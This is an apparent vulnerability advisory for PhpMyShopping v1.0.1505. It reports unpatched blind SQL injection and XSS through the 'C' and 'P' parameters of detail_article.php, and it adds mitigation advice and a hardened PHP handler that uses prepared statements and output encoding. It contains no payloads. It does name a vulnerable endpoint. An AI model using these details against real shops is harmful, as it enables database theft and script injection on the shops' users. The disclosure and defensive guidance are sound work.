Vendor: PhpMyShopping
By: Metropolis
CVSS: 7.5 (HIGH)
CWE: Blind SQL Injections, XSS
Product Name: PhpMyShopping
Affected Version From: v1.0.1505
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
PhpMyShopping Multiple Vulnerabilities
PhpMyShopping v1.0.1505 is vulnerable to blind SQL injection and cross-site scripting (XSS). Both issues are reachable through the 'detail_article.php' page via the 'C' and 'P' parameters. The blind SQL injection arises because the values of these parameters are used in database queries without validation, allowing an attacker to execute arbitrary SQL queries. The XSS vulnerability arises because the same parameter values are reflected into the page without encoding, allowing injection of malicious JavaScript code.
Mitigation:
To mitigate the blind SQL injection vulnerability, validate the 'C' and 'P' parameters against their expected type and pass them to the database through parameterized (prepared) queries rather than string concatenation. To mitigate the XSS vulnerability, sanitize input and apply context-appropriate output encoding (HTML entity encoding) to every value reflected into the page.
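The mitigation above in code, as an added example that is not part of this advisory or of PhpMyShopping itself: a hardened handler for the 'C' and 'P' parameters of detail_article.php using integer validation, a PDO prepared statement and HTML output encoding. The table and column names and the database credentials are assumptions.

```php
<?php
// Added example (not PhpMyShopping's code): hardened handling of the
// 'C' and 'P' parameters of detail_article.php. Table and column names
// (articles, category_id, product_id, title, description) are assumed.
declare(strict_types=1);

// Input validation: both parameters are treated as positive integer identifiers.
// filter_input() returns false for non-integer input and null when absent.
$category = filter_input(INPUT_GET, 'C', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
$product  = filter_input(INPUT_GET, 'P', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);

if ($category === false || $category === null || $product === false || $product === null) {
    http_response_code(400);
    exit('Invalid article reference.');
}

// Parameterized query: values travel separately from the SQL text, so nothing
// in $_GET can change the query structure (this replaces the unsafe pattern
// of concatenating $_GET['C'] / $_GET['P'] into the SQL string).
$pdo = new PDO('mysql:host=localhost;dbname=shop', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // server-side prepared statements
]);
$stmt = $pdo->prepare(
    'SELECT title, description FROM articles WHERE category_id = :c AND product_id = :p'
);
$stmt->execute([':c' => $category, ':p' => $product]);
$article = $stmt->fetch(PDO::FETCH_ASSOC);

if ($article === false) {
    http_response_code(404);
    exit('Article not found.');
}

// Output encoding: every value echoed into HTML is entity-encoded, so any
// injected markup in stored data or request parameters renders as text.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

header('Content-Type: text/html; charset=UTF-8');
echo '<h1>' . e($article['title']) . '</h1>';
echo '<p>' . e($article['description']) . '</p>';
// Reflecting the identifiers back is safe: they were validated as integers
// and are cast again here, so no attacker-controlled string reaches the page.
echo '<a href="detail_article.php?C=' . (int) $category . '&amp;P=' . (int) $product . '">Permalink</a>';
```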